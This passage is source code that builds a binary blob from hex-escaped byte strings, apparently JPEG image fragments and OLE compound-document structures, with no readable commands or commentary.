+"\xc4\xed\xed\x5d\x2a\x5a\xdb\xa4\xbe\x6a\x41\x1a\xbe\x58\xee\x0a"
+"\x33\x96\xc6\xef\xcf\x03\x3f\x4a\x16\xd6\xdd\x19\x19\x20\x8d\x4a"
+"\x16\x2a\x42\x81\xb4\xb1\xcb\x63\xeb\xde\x80\x39\x8d\x3b\x57\xd6"
+"\x66\x8e\xce\xf6\x65\x3e\x55\xe7\x25\x18\xc2\x23\x50\x54\x9f\x90"
+"\x86\x2c\x48\xc7\x43\xd7\x9e\x05\x42\xfa\xb5\xfd\xa5\xa5\xbd\xfc"
+"\x9e\x45\xcd\xdc\xda\x68\x98\x39\x8d\x57\x61\x67\x8c\x63\x3c\x7c"
+"\x83\x76\x4e\x4f\x6e\xa2\xba\x88\xf4\xbd\x3e\x2b\xa7\xb9\x8a\xca"
+"\x04\x99\xf3\xb9\xd5\x00\x27\x3d\x7f\x3e\xfe\xb5\x20\xb3\xb5\x01"
+"\x40\xb7\x8b\x0b\x1f\x92\x06\xc1\xc2\x7f\x77\xe9\xc0\xe2\x80\x2b"
+"\x32\x06\xb6\xfb\x39\x69\x3c\xbd\xbb\x78\x72\x1b\x1f\xef\x67\x3f"
+"\x8e\x69\x65\x5f\x36\x11\x13\xb3\xed\xe3\xa3\x90\x78\xf7\x1c\xd2"
+"\xd1\x4a\xec\xab\x21\x25\x1e\x76\xcd\xec\xff\x00\x23\x06\x1b\x5c"
+"\xaf\x23\xd7\x1d\x7e\x86\x95\xc1\x79\x11\xd9\x9f\x74\x64\x95\xc3"
+"\x10\x3f\x10\x3a\xfe\x34\x51\x45\xd8\x59\x08\xcb\xba\x74\x98\xb3"
+"\xef\x40\x40\xf9\x8e\x39\xf6\xe8\x69\x70\x7c\xff\x00\x3b\x73\xef"
+"\xdb\xb7\xef\x1c\x63\xe9\xd3\xf1\xa2\x8a\x2e\xc2\xc8\x45\x05\x66"
+"\x79\x43\x3e\xe7\xc6\x72\xc4\x8e\x3d\x07\x41\xf8\x51\x18\xf2\x9e"
+"\x46\x46\x7c\xc8\x72\xd9\x62\x7f\x2c\xf4\xfc\x29\x68\xa2\xec\x2c"
+"\x86\x79\xd1\x09\x44\x5e\x62\x79\x84\x6e\x09\x9e\x71\xeb\x8a\x04"
+"\xd1\x19\x5a\x21\x22\x19\x14\x02\x53\x3c\x81\xeb\x8a\x97\xfb\x36"
+"\xdf\x39\xf9\xff\x00\x3a\x3f\xb3\x6d\xff\x00\xdb\xfc\xe8\xb0\xae"
+"\xc8\x92\x68\x9d\xdd\x12\x44\x66\x4c\x06\x50\x79\x5c\xfa\xd1\x1c"
+"\xd1\x48\x58\x47\x22\xb9\x46\xda\xdb\x4e\x70\x7d\x0d\x4b\xfd\x9b"
+"\x6f\xfe\xdf\xe7\x47\xf6\x6d\xbf\xfb\x7f\x9d\x3b\x05\xd9\x14\x73"
+"\x45\x2a\x6f\x8a\x54\x75\xc9\x1b\x95\xb2\x32\x3a\xd2\x2d\xc4\x2d"
+"\x07\x9e\xb3\x46\x62\xc6\x77\x86\x1b\x71\xf5\xa9\xbf\xb3\x6d\xff"
+"\x00\xdb\xfc\xe9\x06\x99\x6e\x06\x06\xe0\x3d\x33\x45\x90\xae\xc8"
+"\x8d\xc4\x22\x0f\x3c\xca\x82\x2c\x6e\xde\x5b\x8c\x7a\xe6\x96\x49"
+"\xe1\x8a\x31\x24\xb2\xa2\x21\x20\x06\x66\xc0\xe7\xa5\x4b\xfd\x9b"
+"\x6f\x8c\x7c\xf8\xfa\xd1\xfd\x9b\x6e\x7a\xef\xfc\xe8\xb2\x0b\xb2"
+"\xe5\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40"
+"\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff"
+"\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11"
+"\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00"
+"\x3f\x00\xea\xee\x35\x5d\x5e\xc6\x2b\x91\x3e\xe0\x12\x15\x94\x3c"
+"\xfe\x50\x75\xf9\xd5\x49\xda\x8c\x7e\x5c\x13\xc9\x1c\x63\xa9\xed"
+"\x6b\x59\xd4\xef\x61\xd4\xda\xd2\xd2\x58\xe3\x05\x6d\x80\x66\x5d"
+"\xdb\x4c\x93\x14\x3f\xf8\xe8\xe0\x56\xad\xb6\x99\x61\x69\x1c\x89"
+"\x6d\x67\x04\x6b\x28\xc4\x81\x50\x7c\xc3\xd0\xfa\x8f\x6a\x2d\xf4"
+"\xbb\x0b\x68\xcc\x76\xf6\x70\xc6\xa5\xc3\x90\xa8\x3e\xf0\xe8\x7f"
+"\x0c\x71\x40\x16\x23\x56\x48\x95\x5d\xcc\x8c\x00\x05\x88\x00\xb1"
+"\xf5\xe2\x9f\x45\x14\x00\x51\x45\x14\x00\xd9\x1b\x64\x6c\xfb\x4b"
+"\x6d\x04\xe0\x75\x35\x8d\xa5\xcf\x7b\x77\x69\x65\xa9\x49\xa9\x43"
+"\xe5\xdc\x80\xe6\x01\x18\xdb\xf3\x0f\xb8\xa7\x39\xdc\x3d\x4e\x7a"
+"\x1e\x07\x6d\xba\xa7\x1e\x95\xa7\xc7\x78\x6e\xe3\xb2\x81\x6e\x09"
+"\x2d\xe6\x04\x19\xc9\xea\x7e\xa7\xd6\x80\x19\x08\xf2\x55\x82\x33"
+"\x61\x98\xb1\xdc\xc5\xb9\x3f\x5a\x23\x5f\x2e\x0f\x25\x59\xf6\x73"
+"\xf7\x9c\x93\xcf\xb9\x39\xa5\xa2\x95\xd9\x56\x43\x4c\x60\xda\xfd"
+"\x98\xb4\x9e\x5e\xdd\xbf\x7d\xb7\x63\xfd\xec\xe7\xf1\xcd\x2c\x8b"
+"\xe6\x41\xe4\xb3\x3e\xce\x3e\xeb\x90\x78\xf7\x07\x34\xb4\x51\x76"
+"\x16\x42\x4a\x3c\xe5\x55\x76\x7c\x2b\x06\x1b\x58\xaf\x23\xe9\x44"
+"\x83\xcd\x78\xd9\xd9\xf3\x1b\x6e\x5c\x31\x03\x3e\xe0\x75\xfc\x69"
+"\x68\xa2\xec\x2c\x84\x60\x5a\x64\x94\xb3\xee\x4c\xe3\x0c\x40\xe7"
+"\xd4\x74\x3f\x8d\x2e\x0f\x9f\xe7\x6e\x7d\xfb\x76\xfd\xe3\x8c\x7d"
+"\x3a\x7e\x34\x51\x45\xd8\x59\x0c\x92\x58\xa3\x2a\x24\x91\x10\xbb"
+"\x6d\x5d\xc7\x19\x3e\x82\x86\x9a\x24\x74\x47\x91\x15\xdf\x3b\x54"
+"\x9e\x5b\xe9\x52\xff\x00\x66\xdb\x9e\xbb\xff\x00\x3a\x3f\xb3\x6d"
+"\xff\x00\xdb\xfc\xe9\xd8\x57\x64\x46\x68\x84\xab\x11\x91\x04\x8c"
+"\x09\x08\x4f\x24\x7a\xe2\x81\x34\x46\x63\x17\x98\x9e\x60\x5d\xc5"
+"\x33\xce\x3d\x71\x52\xff\x00\x66\xdb\xe7\x3f\x3f\xe7\x49\xfd\x99"
+"\x6f\x9c\xfc\xd9\xf5\xcd\x2b\x05\xd9\x1a\xcd\x13\x48\xd1\xac\x88"
+"\x5d\x31\xb9\x41\xe5\x73\xd3\x34\x24\xb1\x48\xcc\x23\x91\x18\xa1"
+"\xc3\x00\x73\xb4\xfa\x1a\x97\xfb\x36\xdf\xfd\xbf\xce\x8f\xec\xdb"
+"\x7f\xf6\xff\x00\x3a\x2c\x17\x64\x51\xcd\x14\xaa\x5a\x29\x51\xd4"
+"\x12\xa4\xab\x67\x04\x75\x14\x89\x3c\x32\x43\xe7\x24\xc8\xd1\x63"
+"\x3b\xc3\x71\x8f\xad\x4d\xfd\x9b\x6e\x3a\x6f\xfc\xe8\x1a\x6d\xb8"
+"\xe9\xbf\xf3\xa7\x64\x17\x65\xca\x28\xa2\x81\x05\x14\x51\x40\x05"
+"\x14\x51\x40\x05\x14\x51\x40\x00\xff\xd9\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00"
+"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03"
+"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xec\xff\x00\xb5\x27\x9f\x46"
+"\xd2\x9d\xa4\x8c\xbd\xec\x6f\xe7\x60\x75\xc4\x2c\xc7\x1e\x9f\x30"
+"\x15\x97\x65\x3d\xcd\x85\x9c\xf7\xb0\xdc\x7d\xcd\x2e\xcb\xe4\x28"
+"\xb8\x50\x49\x04\x93\xd7\x81\xbb\xf3\xf6\xae\xae\x2d\x2e\xc2\x1b"
+"\x99\x6e\x22\xb3\x81\x25\x94\x10\xee\xa8\x01\x6c\xf5\xfc\xfb\xfa"
+"\xd4\x89\x69\x6c\x88\x51\x2d\xe2\x0a\xd1\x88\x88\x08\x30\x50\x67"
+"\x0b\xf4\x19\x3c\x7b\xd0\x06\x36\xb5\xa9\xdf\x43\xaa\x1b\x4b\x39"
+"\x51\x14\x8b\x61\xb8\xa8\x6d\xa6\x49\x4a\x93\xff\x00\x7c\x8e\x2a"
+"\x9d\xd6\xa9\xac\x79\xfa\x81\xb7\x2e\x13\x4f\x61\x18\x2c\x21\x08"
+"\xe4\x20\x62\xd2\x16\x60\x40\x39\xfe\x10\x30\x39\xe7\xa5\x74\x16"
+"\xfa\x5e\x9f\x6d\x1f\x97\x05\x9c\x11\xae\xf1\x26\x02\x0f\xbc\x3a"
+"\x1f\xa8\xed\xe9\x4b\x71\xa6\x58\x5c\xdc\xad\xc5\xc5\x3d\x32\xcc"
+"\xb8\xc3\xb2\x02\x78\xe9\xf5\xc7\x6f\x4a\x00\xb1\x13\x33\xc2\x8e"
+"\xeb\xb1\x99\x41\x2b\x9c\xe0\xfa\x67\xbd\x3e\x8a\x28\x00\xa2\x8a"
+"\x28\x02\x82\x8d\xb3\xb4\xc1\x9f\x7b\x80\x0f\xcc\x71\xc7\xb7\x41"
+"\x44\x63\xcb\x92\x49\x15\x9f\x74\x84\x16\xcb\x12\x3a\x63\x80\x7a"
+"\x7e\x14\xb4\x52\xbb\x2a\xc8\x48\x87\x93\xbf\x63\x3f\xce\xc5\x8e"
+"\xe7\x2d\xc9\xf4\xcf\x4f\xa0\xa2\x25\xf2\xa2\x31\x23\x3e\xd3\x9e"
+"\xae\x49\xe7\xdc\xf3\x4b\x45\x17\x61\x64\x35\x63\x09\x6b\xf6\x75"
+"\x67\x11\xed\xdb\xf7\xce\x71\xfe\xf6\x73\xfa\xd0\xe9\xbe\xdf\xc8"
+"\x66\x7d\x98\x03\x87\x20\xf1\xee\x0e\x69\xd4\x51\x76\x16\x42\x4c"
+"\xbe\x72\x05\x76\x7c\x02\x18\x6d\x72\xa7\x23\xdc\x51\x28\xf3\x59"
+"\x0b\xb3\x65\x1b\x72\xe1\x88\xe7\xdf\x1d\x7f\x1a\x5a\x28\xbb\x0b"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0"
+"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11"
+"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5"
+"\x04\x12\x87\xcb\xba\x15\xf4\x0b\x8f\xeb\x52\x55\x1c\x0c\x63\x1c"
+"\x63\x1f\x85\x2e\x33\x9f\x7e\xb4\xae\x3b\x15\x7f\xb2\xae\x8c\x7b"
+"\x5a\xf1\x8f\xcf\xbb\x19\x38\x18\x20\x8c\x0f\x6c\x54\x67\x4a\xd4"
+"\x9a\x16\x56\xd4\x9c\x3e\x3e\x56\xc9\x6c\x1f\x5c\x55\xec\x73\xf8"
+"\xe7\xf1\xa0\x0c\x11\x8e\xc7\x22\x8b\x85\x8a\xa3\x4f\xd4\x44\x5e"
+"\x5f\xdb\x98\x02\x72\x49\x72\x4a\xe3\x3c\x67\x03\x3f\x5a\xd7\x18"
+"\x03\x19\xe9\x54\x40\x00\x00\x06\x00\x18\x14\x60\x7e\x98\xfc\x28"
+"\xb8\x58\xbd\x55\xae\x61\x9d\xee\x23\x78\xe4\xc2\x0e\x19\x77\x11"
+"\xdf\xaf\x1d\x7e\x95\x19\x00\xe7\x3d\xfa\xd1\x8e\x73\xef\x9f\xc6"
+"\x8b\x85\x84\xf2\xae\xb3\xf7\x23\xeb\xfd\xee\xd4\x08\xae\xb8\xca"
+"\x47\xef\xcd\x5f\xa2\x98\x8a\x1e\x55\xdf\xf7\x23\xe9\xeb\xde\x83"
+"\x15\xde\x38\x48\xf3\x8f\x5e\xf5\x7e\x8a\x00\xa0\x62\xba\xe7\x09"
+"\x1f\xb7\xcd\x47\x95\x77\xfd\xc8\xfa\xff\x00\x7b\xb5\x5f\xa2\x80"
+"\x28\x08\xae\xb8\xca\x47\xf9\xd0\x22\xbb\xe3\x29\x1f\x4e\x79\xab"
+"\xf4\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45"
+"\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45"
+"\x14\x50\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00"
+"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03"
+"\x11\x00\x3f\x00\xee\xce\x95\x7b\x24\x91\xcb\x2d\xd8\xf3\x23\x5d"
+"\xaa\xc0\x9e\xb8\xc6\x7f\x1a\x74\x9a\x7e\xa5\x26\xe6\xfb\x7b\x23"
+"\x33\x67\x6a\xb9\xc0\x18\x3c\x0a\xb5\x8e\x73\xef\x9f\xc6\x80\x00"
+"\xc6\x3b\x52\xb8\xec\x5c\x40\x42\x00\x4e\x48\x1c\x9f\x5a\x5a\xa3"
+"\x81\x8c\x7b\x63\xf0\xa5\x20\x1c\xe7\xbf\x5a\x2e\x16\x2d\x48\x25"
+"\x24\x79\x6e\xaa\x3b\xe5\x73\x4f\x1d\x06\x4f\x35\x4b\x1c\xe7\xdf"
+"\x3f\x8d\x00\x63\xa7\xae\x7f\x1a\x2e\x16\x24\xb8\xc7\x9c\x0f\xcb"
+"\x9d\xbf\x8d\x52\xbe\x03\x62\x64\x0e\x1b\xbf\x5e\x9d\xaa\xc8\x00"
+"\x22\x33\x71\x00\x83\xcf\x33\x20\x87\x1b\xbc\xc2\xdf\x2e\x3d\x73"
+"\x4b\x24\xf0\xc5\x17\x9b\x24\xa8\x91\xf1\xf3\x13\xc7\x3d\x2a\x4f"
+"\xec\xcb\x7c\x63\xe6\xc7\xa6\x69\x4e\x9b\x6e\x7a\xef\xfc\xe9\xd9"
+"\x13\x76\x45\x24\xd1\x44\x14\xcb\x22\x20\x66\x0a\x37\x1c\x64\x9e"
+"\xd4\x3c\xd1\x46\xe8\x8f\x22\x2b\x39\xc2\x02\x70\x58\xfb\x54\xbf"
+"\xd9\xb6\xff\x00\xed\xfe\x74\x7f\x66\xdb\xff\x00\xb7\xf9\xd1\x61"
+"\xdd\x91\x19\x62\x12\xac\x4d\x22\x09\x18\x12\xaa\x4f\x24\x0a\x3c"
+"\xe8\xbc\xef\x27\xcc\x4f\x37\x6e\xed\x99\xe7\x1e\xb8\xa9\x7f\xb3"
+"\x6d\xf3\x9f\x9f\xf3\xa3\xfb\x36\xdf\x39\xf9\xf3\xf5\xa5\x60\xbb"
+"\x22\x59\xa2\x69\x1a\x35\x91\x0b\xa6\x37\x28\x3c\x8c\xf4\xcd\x09"
+"\x34\x52\x33\xac\x72\x23\x32\x1c\x30\x07\x25\x4f\xa1\xa9\x7f\xb3"
+"\x6d\xf3\x9f\x9f\xf3\xa3\xfb\x36\xdf\xfd\xbf\xce\x8b\x05\xd9\x72"
+"\x8a\x28\xa6\x20\xa2\x8a\x28\x00\xa2\x8a\x28\x00\xa2\x8a\x28\x00"
+"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8"
+"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01"
+"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f"
+"\x00\xf5\x42\x70\x32\x7a\x0a\xa0\x35\xad\x38\xdb\xf9\xe2\x73\xe5"
+"\xfd\x9f\xed\x3b\xbc\xb6\xff\x00\x57\xeb\xd3\xf4\xeb\x5a\x14\x50"
+"\x02\x29\x0c\xa1\x87\x42\x32\x29\x68\xa2\x80\x22\xb9\x48\xe4\xb6"
+"\x95\x27\xc7\x94\xc8\x43\xe4\xe0\x63\x1c\xf3\x55\x86\x36\x8c\x74"
+"\xc7\x15\x66\xe4\xc4\x2d\x65\x37\x1b\x7c\x90\x84\xc9\xbf\xa6\xdc"
+"\x73\x9f\x6c\x55\x55\x20\xa8\x2b\xd3\x1c\x7d\x28\x63\x5b\x8b\x59"
+"\xb3\xa4\x69\x73\x29\x8f\xab\xb6\xe7\xe7\x3f\x36\x07\xe5\xd0\x71"
+"\x5a\x55\x9b\x30\x84\x5c\xcd\xe4\xed\xce\xef\xde\x6d\xfe\xf6\x07"
+"\x5f\x7c\x62\x92\x09\x1a\x2e\x37\xcd\x1c\xac\xcf\xba\x3c\xed\xc3"
+"\x90\x39\xf5\x1d\x0f\xe3\x4a\x41\x33\x89\xb7\x3e\xf0\xbb\x7e\xf1"
+"\xc6\x3e\x9d\x28\xa2\x8b\xb1\xd9\x08\x17\x17\x0d\x38\x67\xde\xca"
+"\x14\xfc\xc7\x18\xfa\x74\xa5\x40\x52\x59\x24\x56\x7d\xd2\x63\x76"
+"\x58\x91\xc7\xa0\x3c\x0f\xc2\x8a\x28\xbb\x0b\x21\x11\x76\x09\x00"
+"\x2c\x44\x84\xb3\x06\x62\xc3\x9f\xaf\x41\xed\x4b\x45\x14\x82\xd6"
+"\x0a\xcd\x99\xe2\x7b\xa9\x84\x58\xca\xb6\xd7\xc0\xc7\xcd\x81\xf9"
+"\xf1\x8a\xd2\xac\xe9\xe4\x12\x5c\xca\x02\xb0\xd8\xdb\x49\x61\x8c"
+"\xf0\x0e\x47\xa8\xe6\x9a\x14\x8b\xd1\xcd\x14\xa1\x8c\x52\x23\x85"
+"\x62\xa7\x69\xce\x08\xea\x29\x12\x78\x64\x8b\xcd\x8e\x54\x68\xf9"
+"\xf9\xc3\x02\x38\xeb\xcd\x4d\xfd\x9b\x6e\x3a\x6f\xfc\xe8\xfe\xcd"
+"\xb7\xff\x00\x6f\xf3\xa7\x64\x2b\xb2\x11\x71\x09\x83\xcf\x13\x21"
+"\x87\x1b\xbc\xc0\xc3\x6e\x3d\x73\x44\x97\x10\x47\x07\x9d\x24\xc8"
+"\xb1\x60\x1d\xe5\x86\x39\xe9\xcd\x4b\xfd\x99\x6f\x8c\x7c\xd8\xf4"
+"\xcd\x1f\xd9\x96\xf8\xc7\xcd\x8f\x4c\xd1\x64\x17\x64\x72\x4d\x14"
+"\x4a\x1a\x59\x11\x01\x20\x02\xc7\x19\x27\xa0\xa1\xe6\x8a\x36\x45"
+"\x92\x44\x42\xe7\x6a\x86\x38\xdc\x7d\x05\x4b\xfd\x9b\x6f\xfe\xdf"
+"\xe7\x47\xf6\x6d\xbf\xfb\x7f\x9d\x2b\x0e\xec\x88\xcb\x12\xca\x91"
+"\x34\x88\x1d\xf3\xb5\x49\xe4\xe3\xae\x2a\x8c\xf2\x17\xb9\x90\x32"
+"\x32\xed\x6d\xa0\x9f\xe2\x18\x1c\x8f\x6f\xf0\xad\x3f\xec\xdb\x7f"
+"\xf6\xff\x00\x3a\x3f\xb3\x60\xf5\x7f\xce\x98\xb5\x2e\x51\x45\x14"
+"\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\xff\xd9\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x74\xaa\xd7\xdf\x71\x39\x1d\x7d\x28\xea\x1d\x0b\x1e\x55\xde\x3e"
+"\xe4\x79\xc7\xaf\x7a\x0c\x57\x7c\xe1\x23\xf6\xe6\xaf\xd1\x4c\x45"
+"\x0f\x2a\xeb\xfb\x91\xf5\xfe\xf7\x6a\x3c\xab\xac\x8c\xa4\x7d\x79"
+"\xf9\xaa\xfd\x14\x01\x40\x45\x77\x81\x94\x8f\xa7\x3c\xd1\xe5\x5d"
+"\xe3\xee\x47\x9c\x7a\xf7\xab\xf4\x50\x05\x03\x15\xdf\x38\x48\xfd"
+"\xb9\xa8\xe6\xb5\xba\x95\x71\xb5\x40\x07\x38\x07\xad\x69\xd1\x40"
+"\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40"
+"\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40"
+"\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x81\x00\x00\x00\x82\x00\x00\x00\x83\x00\x00\x00\x84\x00\x00\x00"
+"\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00\x88\x00\x00\x00"
+"\x89\x00\x00\x00\x8a\x00\x00\x00\x8b\x00\x00\x00\x8c\x00\x00\x00"
+"\x8d\x00\x00\x00\x8e\x00\x00\x00\x8f\x00\x00\x00\x90\x00\x00\x00"
+"\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\x94\x00\x00\x00"
+"\xfe\xff\xff\xff\x96\x00\x00\x00\x98\x00\x00\x00\xfe\xff\xff\xff"
+"\xc8\x00\x00\x00\x9a\x00\x00\x00\x9b\x00\x00\x00\x9c\x00\x00\x00"
+"\x9d\x00\x00\x00\x9e\x00\x00\x00\x9f\x00\x00\x00\xa0\x00\x00\x00"
+"\xa1\x00\x00\x00\xa2\x00\x00\x00\xa3\x00\x00\x00\xa4\x00\x00\x00"
+"\xa5\x00\x00\x00\xa6\x00\x00\x00\xa7\x00\x00\x00\xa8\x00\x00\x00"
+"\xa9\x00\x00\x00\xaa\x00\x00\x00\xab\x00\x00\x00\xac\x00\x00\x00"
+"\xad\x00\x00\x00\xae\x00\x00\x00\xaf\x00\x00\x00\xb0\x00\x00\x00"
+"\xb1\x00\x00\x00\xb2\x00\x00\x00\xb3\x00\x00\x00\xb4\x00\x00\x00"
+"\xb5\x00\x00\x00\xb6\x00\x00\x00\xb7\x00\x00\x00\xb8\x00\x00\x00"
+"\xb9\x00\x00\x00\xba\x00\x00\x00\xbb\x00\x00\x00\xbc\x00\x00\x00"
+"\xbd\x00\x00\x00\xbe\x00\x00\x00\xbf\x00\x00\x00\xc0\x00\x00\x00"
+"\xc1\x00\x00\x00\xc2\x00\x00\x00\xc3\x00\x00\x00\xc4\x00\x00\x00"
+"\xc5\x00\x00\x00\xc6\x00\x00\x00\xc7\x00\x00\x00\xfe\xff\xff\xff"
+"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\xe0\x85\x9f\xf2\xf9\x4f\x68\x10"
+"\xab\x91\x08\x00\x2b\x27\xb3\xd9\x01\x00\x00\x00\xe0\x85\x9f\xf2"
+"\xf9\x4f\x68\x10\xab\x91\x08\x00\x2b\x27\xb3\xd9\x30\x00\x00\x00"
+"\x18\x5d\x00\x00\x09\x00\x00\x00\x01\x00\x00\x00\x50\x00\x00\x00"
